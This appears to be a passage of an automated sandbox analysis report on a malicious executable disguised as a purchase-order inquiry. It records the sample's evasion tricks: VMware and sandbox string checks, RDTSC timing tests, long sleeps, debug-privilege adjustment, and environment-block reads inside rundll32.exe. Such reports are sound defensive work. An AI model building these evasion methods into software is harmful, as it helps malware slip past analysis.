        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PO-INQUIRY-VALE-SP-2022-60.exe PID: 7000, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeRDTSC instruction interceptor: First address: 0000000000408A44 second address: 0000000000408A4A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeRDTSC instruction interceptor: First address: 0000000000408DDE second address: 0000000000408DE4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000025B8A44 second address: 00000000025B8A4A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000025B8DDE second address: 00000000025B8DE4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe TID: 7004Thread sleep time: -43731s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 4396Thread sleep time: -100000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00408D10 rdtsc 4_2_00408D10
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.7 %
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeThread delayed: delay time: 43731Jump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: explorer.exe, 00000005.00000000.505402792.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000005.00000000.524317601.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000005.00000000.524317601.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: explorer.exe, 00000005.00000000.505833964.0000000007F91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000005.00000000.474241624.0000000006915000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000005.00000000.524317601.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: explorer.exe, 00000005.00000000.505833964.0000000007F91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00408D10 rdtsc 4_2_00408D10
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F0050 mov eax, dword ptr fs:[00000030h]10_2_045F0050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F0050 mov eax, dword ptr fs:[00000030h]10_2_045F0050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04692073 mov eax, dword ptr fs:[00000030h]10_2_04692073
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A1074 mov eax, dword ptr fs:[00000030h]10_2_046A1074
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A44B mov eax, dword ptr fs:[00000030h]10_2_0460A44B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F746D mov eax, dword ptr fs:[00000030h]10_2_045F746D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466C450 mov eax, dword ptr fs:[00000030h]10_2_0466C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466C450 mov eax, dword ptr fs:[00000030h]10_2_0466C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460BC2C mov eax, dword ptr fs:[00000030h]10_2_0460BC2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460002D mov eax, dword ptr fs:[00000030h]10_2_0460002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460002D mov eax, dword ptr fs:[00000030h]10_2_0460002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460002D mov eax, dword ptr fs:[00000030h]10_2_0460002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460002D mov eax, dword ptr fs:[00000030h]10_2_0460002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460002D mov eax, dword ptr fs:[00000030h]10_2_0460002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A740D mov eax, dword ptr fs:[00000030h]10_2_046A740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A740D mov eax, dword ptr fs:[00000030h]10_2_046A740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A740D mov eax, dword ptr fs:[00000030h]10_2_046A740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691C06 mov eax, dword ptr fs:[00000030h]10_2_04691C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656C0A mov eax, dword ptr fs:[00000030h]10_2_04656C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656C0A mov eax, dword ptr fs:[00000030h]10_2_04656C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656C0A mov eax, dword ptr fs:[00000030h]10_2_04656C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656C0A mov eax, dword ptr fs:[00000030h]10_2_04656C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657016 mov eax, dword ptr fs:[00000030h]10_2_04657016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657016 mov eax, dword ptr fs:[00000030h]10_2_04657016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657016 mov eax, dword ptr fs:[00000030h]10_2_04657016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EB02A mov eax, dword ptr fs:[00000030h]10_2_045EB02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EB02A mov eax, dword ptr fs:[00000030h]10_2_045EB02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EB02A mov eax, dword ptr fs:[00000030h]10_2_045EB02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EB02A mov eax, dword ptr fs:[00000030h]10_2_045EB02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A4015 mov eax, dword ptr fs:[00000030h]10_2_046A4015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A4015 mov eax, dword ptr fs:[00000030h]10_2_046A4015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046914FB mov eax, dword ptr fs:[00000030h]10_2_046914FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656CF0 mov eax, dword ptr fs:[00000030h]10_2_04656CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656CF0 mov eax, dword ptr fs:[00000030h]10_2_04656CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656CF0 mov eax, dword ptr fs:[00000030h]10_2_04656CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D58EC mov eax, dword ptr fs:[00000030h]10_2_045D58EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466B8D0 mov eax, dword ptr fs:[00000030h]10_2_0466B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0466B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466B8D0 mov eax, dword ptr fs:[00000030h]10_2_0466B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466B8D0 mov eax, dword ptr fs:[00000030h]10_2_0466B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466B8D0 mov eax, dword ptr fs:[00000030h]10_2_0466B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466B8D0 mov eax, dword ptr fs:[00000030h]10_2_0466B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8CD6 mov eax, dword ptr fs:[00000030h]10_2_046A8CD6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A0 mov eax, dword ptr fs:[00000030h]10_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A0 mov eax, dword ptr fs:[00000030h]10_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A0 mov eax, dword ptr fs:[00000030h]10_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A0 mov eax, dword ptr fs:[00000030h]10_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A0 mov eax, dword ptr fs:[00000030h]10_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A0 mov eax, dword ptr fs:[00000030h]10_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E849B mov eax, dword ptr fs:[00000030h]10_2_045E849B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046190AF mov eax, dword ptr fs:[00000030h]10_2_046190AF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9080 mov eax, dword ptr fs:[00000030h]10_2_045D9080
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460F0BF mov ecx, dword ptr fs:[00000030h]10_2_0460F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460F0BF mov eax, dword ptr fs:[00000030h]10_2_0460F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460F0BF mov eax, dword ptr fs:[00000030h]10_2_0460F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04653884 mov eax, dword ptr fs:[00000030h]10_2_04653884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04653884 mov eax, dword ptr fs:[00000030h]10_2_04653884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F7D50 mov eax, dword ptr fs:[00000030h]10_2_045F7D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FB944 mov eax, dword ptr fs:[00000030h]10_2_045FB944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FB944 mov eax, dword ptr fs:[00000030h]10_2_045FB944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04613D43 mov eax, dword ptr fs:[00000030h]10_2_04613D43
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04653540 mov eax, dword ptr fs:[00000030h]10_2_04653540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FC577 mov eax, dword ptr fs:[00000030h]10_2_045FC577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FC577 mov eax, dword ptr fs:[00000030h]10_2_045FC577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DB171 mov eax, dword ptr fs:[00000030h]10_2_045DB171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DB171 mov eax, dword ptr fs:[00000030h]10_2_045DB171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC962 mov eax, dword ptr fs:[00000030h]10_2_045DC962
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0465A537 mov eax, dword ptr fs:[00000030h]10_2_0465A537
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460513A mov eax, dword ptr fs:[00000030h]10_2_0460513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460513A mov eax, dword ptr fs:[00000030h]10_2_0460513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604D3B mov eax, dword ptr fs:[00000030h]10_2_04604D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604D3B mov eax, dword ptr fs:[00000030h]10_2_04604D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604D3B mov eax, dword ptr fs:[00000030h]10_2_04604D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9100 mov eax, dword ptr fs:[00000030h]10_2_045D9100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9100 mov eax, dword ptr fs:[00000030h]10_2_045D9100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9100 mov eax, dword ptr fs:[00000030h]10_2_045D9100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8D34 mov eax, dword ptr fs:[00000030h]10_2_046A8D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E3D34 mov eax, dword ptr fs:[00000030h]10_2_045E3D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DAD30 mov eax, dword ptr fs:[00000030h]10_2_045DAD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F4120 mov eax, dword ptr fs:[00000030h]10_2_045F4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F4120 mov eax, dword ptr fs:[00000030h]10_2_045F4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F4120 mov eax, dword ptr fs:[00000030h]10_2_045F4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F4120 mov eax, dword ptr fs:[00000030h]10_2_045F4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F4120 mov ecx, dword ptr fs:[00000030h]10_2_045F4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046641E8 mov eax, dword ptr fs:[00000030h]10_2_046641E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04688DF1 mov eax, dword ptr fs:[00000030h]10_2_04688DF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656DC9 mov eax, dword ptr fs:[00000030h]10_2_04656DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656DC9 mov eax, dword ptr fs:[00000030h]10_2_04656DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656DC9 mov eax, dword ptr fs:[00000030h]10_2_04656DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656DC9 mov ecx, dword ptr fs:[00000030h]10_2_04656DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656DC9 mov eax, dword ptr fs:[00000030h]10_2_04656DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04656DC9 mov eax, dword ptr fs:[00000030h]10_2_04656DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DB1E1 mov eax, dword ptr fs:[00000030h]10_2_045DB1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DB1E1 mov eax, dword ptr fs:[00000030h]10_2_045DB1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DB1E1 mov eax, dword ptr fs:[00000030h]10_2_045DB1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045ED5E0 mov eax, dword ptr fs:[00000030h]10_2_045ED5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045ED5E0 mov eax, dword ptr fs:[00000030h]10_2_045ED5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046061A0 mov eax, dword ptr fs:[00000030h]10_2_046061A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046061A0 mov eax, dword ptr fs:[00000030h]10_2_046061A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046035A1 mov eax, dword ptr fs:[00000030h]10_2_046035A1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046569A6 mov eax, dword ptr fs:[00000030h]10_2_046569A6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A05AC mov eax, dword ptr fs:[00000030h]10_2_046A05AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A05AC mov eax, dword ptr fs:[00000030h]10_2_046A05AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04601DB5 mov eax, dword ptr fs:[00000030h]10_2_04601DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04601DB5 mov eax, dword ptr fs:[00000030h]10_2_04601DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04601DB5 mov eax, dword ptr fs:[00000030h]10_2_04601DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D2D8A mov eax, dword ptr fs:[00000030h]10_2_045D2D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D2D8A mov eax, dword ptr fs:[00000030h]10_2_045D2D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D2D8A mov eax, dword ptr fs:[00000030h]10_2_045D2D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D2D8A mov eax, dword ptr fs:[00000030h]10_2_045D2D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D2D8A mov eax, dword ptr fs:[00000030h]10_2_045D2D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046551BE mov eax, dword ptr fs:[00000030h]10_2_046551BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046551BE mov eax, dword ptr fs:[00000030h]10_2_046551BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046551BE mov eax, dword ptr fs:[00000030h]10_2_046551BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046551BE mov eax, dword ptr fs:[00000030h]10_2_046551BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FC182 mov eax, dword ptr fs:[00000030h]10_2_045FC182
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602581 mov eax, dword ptr fs:[00000030h]10_2_04602581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602581 mov eax, dword ptr fs:[00000030h]10_2_04602581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602581 mov eax, dword ptr fs:[00000030h]10_2_04602581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602581 mov eax, dword ptr fs:[00000030h]10_2_04602581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A185 mov eax, dword ptr fs:[00000030h]10_2_0460A185
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602990 mov eax, dword ptr fs:[00000030h]10_2_04602990
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460FD9B mov eax, dword ptr fs:[00000030h]10_2_0460FD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460FD9B mov eax, dword ptr fs:[00000030h]10_2_0460FD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468B260 mov eax, dword ptr fs:[00000030h]10_2_0468B260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468B260 mov eax, dword ptr fs:[00000030h]10_2_0468B260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8A62 mov eax, dword ptr fs:[00000030h]10_2_046A8A62
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0461927A mov eax, dword ptr fs:[00000030h]10_2_0461927A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9240 mov eax, dword ptr fs:[00000030h]10_2_045D9240
